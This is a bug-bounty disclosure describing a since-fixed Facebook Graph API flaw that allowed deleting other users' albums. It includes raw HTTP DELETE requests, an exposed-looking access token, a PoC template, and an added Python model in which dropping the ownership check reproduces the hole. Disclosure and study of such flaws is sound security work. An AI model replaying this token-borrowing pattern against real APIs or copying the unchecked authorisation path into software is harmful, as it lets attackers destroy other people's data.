Facebook album deletion vulnerability worth USD 12500
Overview: What if your photos were deleted without your knowledge?
Obviously, that would be annoying, right? This article is about a vulnerability I found that allowed a malicious user to delete any album on Facebook. Yes, any album belonging to any user, page, or group could be deleted.
The Graph API is the primary method developers use to read and write user data; every Facebook app uses it. Generally, the Graph API requires an access token to read or write user data.
Facebook's developer documentation states that an album cannot be deleted through the album node of the Graph API.
I tried anyway, using an access token from the Graph API Explorer to delete one of my own albums.
Request:
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response:
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
Why? This application does not have the capability to delete an album. But pay attention to the error message: it tells us that some other application does have the capability to call this API.
I decided to try the access token of Facebook's own mobile app, because the Facebook mobile app offers an option to delete any of your albums, doesn't it? And it uses the same API. So I took my own album id together with the Facebook for Android access token and tried again.
Request:
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:
true

Album 518171421550249 got deleted :D So what was the next step? I took a victim's album id and tried to delete it. I was very curious to see the result.

Request:
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:
true
Oh my God! The album was deleted! So I held the key to deleting all of your Facebook albums, haha.
I immediately reported this vulnerability to the Facebook security team. They responded very quickly and had a fix in place in less than two hours.
Finally, PoC:
Request:
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
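The root cause, seen from the server side: the album node's DELETE handler checked that the calling application was allowed to delete albums, but never checked that the token's user actually owned the album. The following is an added example, not Facebook's code, that models both checks on an in-memory album store with constructed ids and app names; passing check_ownership=False reproduces the gap the PoC above relies on.

```python
from dataclasses import dataclass

@dataclass
class Token:
    app_id: str   # application the token was issued to
    user_id: str  # user who authorised that application

@dataclass
class Album:
    album_id: str
    owner_id: str

# Constructed capability table; app names are hypothetical labels.
APP_CAPABILITIES = {
    "graph_explorer": set(),                    # cannot delete albums
    "facebook_for_android": {"delete_album"},   # first-party app can
}

CAPABILITY_ERROR = "(#200) Application does not have the capability to make this API call."
OWNERSHIP_ERROR = "(#200) Token user is not the owner of this album."  # modelled message

def graph_error(message, code=200):
    """Build an error envelope shaped like the one quoted in the write-up."""
    return {"error": {"message": message, "type": "OAuthException", "code": code}}

def delete_album(albums, album_id, token, check_ownership=True):
    """Handle DELETE /{album_id}. check_ownership=False reproduces the bug."""
    album = albums.get(album_id)
    if album is None:
        return graph_error("Unsupported delete request.", code=100)
    # Check 1: does the calling app have the capability at all? This is the
    # check that rejected the Graph Explorer token in the write-up.
    if "delete_album" not in APP_CAPABILITIES.get(token.app_id, set()):
        return graph_error(CAPABILITY_ERROR)
    # Check 2: object-level authorisation. A capability says what the app may
    # do in general; it says nothing about whose album this is.
    if check_ownership and token.user_id != album.owner_id:
        return graph_error(OWNERSHIP_ERROR)
    del albums[album_id]
    return True  # the Graph API answers a successful DELETE with "true"

def attacker_deletes_victim_album(check_ownership):
    """Attacker holds a token for the capable app but does not own album 1001."""
    albums = {"1001": Album("1001", owner_id="victim")}          # constructed data
    attacker = Token(app_id="facebook_for_android", user_id="attacker")
    result = delete_album(albums, "1001", attacker, check_ownership)
    return result, len(albums)  # albums left after the request
```

With the ownership check the attacker gets an error and the album survives; without it the handler returns true and the album is gone, exactly the behaviour the two responses above show.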
If you are not sure what to do, watch the following video:
The Facebook security team sent the first thank-you letter:
I was rewarded 12500 USD for my report and my follow-up replies about the vulnerability.
The vulnerability has been completely fixed.
Thanks to the Facebook security team for running the bug bounty program and for fixing this vulnerability so quickly.